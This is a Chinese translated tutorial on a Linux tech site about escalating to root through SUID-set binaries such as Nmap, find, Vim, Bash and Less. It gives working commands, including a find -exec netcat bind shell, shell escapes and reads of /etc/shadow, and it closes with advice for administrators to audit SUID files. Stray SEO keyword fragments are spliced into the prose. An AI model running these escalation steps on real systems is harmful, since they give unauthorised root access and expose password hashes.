LinuxGod.net
Linux大神网——精选每一篇高品质的技术干货
  1. 首页
  2. 开源快讯
  3. 正文

为什么要给Linux二进制文件设置这种权限?(上)

2023年1月15日 36点热度

译者:shan66

预估稿费:90RMB

投稿方式:发送邮件至linwei#,或登陆网页版在线投稿

SUID

SUID(设置用户ID)是赋予文件的一种权限linux提升权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。那么,为什么要给Linux二进制文件设置这种权限呢?其实原因有很多,例如,程序ping需要root权限才能打开网络套接字,但执行该程序的用户通常都是由普通用户,来验证与其他主机的连通性。

但是linux windows,如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。其中,大家熟知的具有提权功能的Linux可执行文件包括:

Nmap
Vim
find
Bash
More
Less
Nano

cp

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

查找SUID可执行文件

以上所有二进制文件都将以root用户权限来执行,因为它们的权限中包含“s”,并且它们的属主为root。

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

SUID可执行文件——Nmap

Nmap

较旧版本的Nmap(2.02至5.21)带有交互模式,从而允许用户执行shell命令。由于Nmap位于上面使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。

win7 提升权限_安卓手机root提升权限_linux提升权限

nmap -V

识别Nmap的版本

为了启动交互模式,可以使用Nmap参数“interactive”。

Nmap——交互模式

以下命令将提供一个提权后的shell。

nmap> !sh
sh-3.2# whoami
root

通过Suid Nmap二进制文件获得Root Shell

此外,还有一个Metasploit模块,也可以通过SUID Nmap二进制文件进行提权。

exploit/unix/local/setuid_nmap

linux提升权限_win7 提升权限_安卓手机root提升权限

Find

实用程序find用来在系统中查找文件。同时,它也有执行命令的能力。 因此linux提升权限,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。

touch pentestlab
find pentestlab -exec whoami ;

Find执行命令的功能

由于大多数Linux操作系统都安装了netcat,因此可以将提权后的命令提升为root shell。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh ;

通过Find运行Netcat

连接到打开的端口就能得到一个root shell。

netcat 192.168.1.189 5555
id
cat /etc/shadow

通过Find取得Root Shell

Vim

Vim的主要用途是用作文本编辑器。 但是,如果以SUID运行,它将继承root用户的权限,因此可以读取系统上的所有文件。

vim.tiny /etc/shadow

Vim ——以root权限读取文件

此外,我们还可以通过Vim运行shell来执行只有root才能完成的操作。

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

http://p9.qhimg.com/t01d2428cbe27497881.png

Vim——Root Shell

Bash

以下命令将以root身份打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Bash——Root Shell

Less

程序Less也可以执行提权后的shell。同样的方法也适用于其他许多命令。

less /etc/passwd
!/bin/sh

Less——Root Shell

结束语

由于通过误设SUID的可执行文件可以轻而易举的实现提权,因此,管理员应仔细审查所有SUID二进制文件,看看到底是否真的需要使用提权后运行。在这个审查过程中linux 下载,应该特别关注能够在系统上执行代码或写入数据的那些应用程序。

本作品采用 知识共享署名 4.0 国际许可协议 进行许可
标签: 交互 投稿 操作 权限 读取
最后更新:2023年1月15日

Linux大神网

每日更新,欢迎收藏♥ 不积跬步无以至千里,加油,共勉。

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

Linux大神网

每日更新,欢迎收藏♥
不积跬步无以至千里,加油,共勉。

最新 热点 随机
最新 热点 随机
英伟达将LinuxGPU内核模块作为开放源码/MIT双重许可证(图) virtualboxlinux官方版免费、小巧,同时支持Windows、Linux和Mac系统主机 Linux平台下的嵌入式软件要具备说明技能吗? 图解linuxlinux内核结构框图对内核框图有个总体的把握 linux虚拟机的安装步骤是什么?虚拟机和服务器的区别 精通Linux程序设计的高级程序员并非一件可望不可及的事情 linux虚拟机软件 Linux在安装的时候要注意什么?Linux安装注意事项 Python都有哪些应用,学习完成Python后能的工作方向 微软考虑用Rust开发内核的Linux内核-Hartman Linux内核和文件系统权限管理的基本用法——ACL权限 Linux内核启动有次引导程序Grub 小白在阿里云云服务器上如何发布自己的网站(建站|详细) 阿里云>社区>主题地图S>查看存储推荐 Linux的内核放在了哪里?/boot的启动目录一览 Linux中修改文件权限的命令、创建者所在组、所有人 linux到底难不难学呢?推荐可以查看Linux命令大全 Linux下修改文件权限的权限与所有权的实现就显得很有必要 国内性价比很高的Linux虚拟主机系统安装的流程是什么? 1.Linux磁盘分区和目录Linux发行版本之间的差别很少? 基于命令修改文件的权限命令-ld
Linux5.12的推送请求不断涌入新开放的合并窗口预计4月底看到它的稳定版本go语言被称作互联网时代的c语言,用来开发嵌入式linux的理由腾讯云服务器上也搭建一套环境,安装成功自动启动个人笔记本安装Ubuntu20.04LTS下载地址启动第一步--加载BIOS当你打开计算机电源(组图)虚拟机安装Ubuntu操作系统-Ubuntu空间20G镜像下载指令中各个make-C~/linuxM=`pwd编译Linux启动过程中的几个部分内核的引导(图)如何在Linux上安装虚拟机的结果大多都是怎么安装的一个免费软件时间跟进的小白鼠是什么鬼?专题计算机是如何启动的?、内核操作系统的启动流程学习Linux最简单、最实用的环境就是虚拟机环境(上)linux系统位数最简单的命令--linux基于命令修改文件的权限命令-lddf显示指定磁盘文件和目录的磁盘使用空间命令参数《构建高性能web站点》推荐理由及方法都能找到1.Linux磁盘分区和目录Linux发行版本之间的差别很少?centos系统版本详细信息解决方案与操作系统版本兼容的重要性分析国内性价比很高的Linux虚拟主机系统安装的流程是什么?Linux下修改文件权限的权限与所有权的实现就显得很有必要
虚拟主机技术极大怎么样?如何选择多个网站.Q. 一个系统安装使用手册Alternate版Ubuntu系统U盘安装系统下载 使用u盘在IBMx3650服务器上安装linux系统?我猜两种情况 【好玩的网络-第2.5期】分配IP有哪些骚操作?小白保姆级教程 2022年最适合旧PC的10款轻量级Linux发行版 0005编程精粹-Microsoft编写优质无错程序秘诀(bjchenxu) 一段程序是告诉计算机应该如何完成一个任务的程序 一个/sys/bus/iio/devices:device0传感器 如何知道自己的Linux内核版本的几种方法?方法 VR物联网智能家居实训套件你能get的技能精致并不是 Linux修改默认端口更改-mr7777端口修改 Linux计算机的防火墙必需运行OpenSSH服务器软件 嵌入式LINUX系统培训班-国嵌课程 【中信建投】供应MXNTP10系列采用北斗卫星时钟信号 PS教程:如何用gif文件来形容文件的意思? 和VisualStudioCode如何使用VSCode运行C和C++程序 《深入linux设备驱动程序内核机制》(1)_社会万象_光明网(图) Linux内核和文件系统权限管理的基本用法——ACL权限 remminaRemmina安装rdesktop Linux操作系统提权漏洞的解决办法有哪些?-八维教育
标签聚合
sudo 文件目录 unix 电脑 虚拟机 命令模式 linux服务器 shell linux系统 软件
书籍
课程
技术群
技术干货大合集↓
  • 2023年2月 / 1篇
  • 2023年1月 / 161篇
  • 2022年12月 / 187篇
  • 2022年11月 / 76篇

COPYRIGHT © 2023 linuxgod.net ALL RIGHTS RESERVED.